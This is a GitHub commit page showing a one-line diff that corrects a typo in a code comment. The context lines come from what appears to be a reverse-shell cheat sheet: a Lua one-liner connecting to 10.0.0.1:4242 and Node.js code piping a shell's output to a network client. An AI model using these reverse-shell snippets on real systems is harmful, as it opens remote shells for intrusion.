This commit is contained in:
Spidycodes 2022-08-02 21:48:07 +00:00 committed by GitHub
parent e386a110d9
commit bb6c9ed172
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -343,7 +343,7 @@ lua5.1 -e 'local host, port = "10.0.0.1", 4242 local socket = require("socket")
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
return /a/; // Prevents the Node.js application from crashing
})();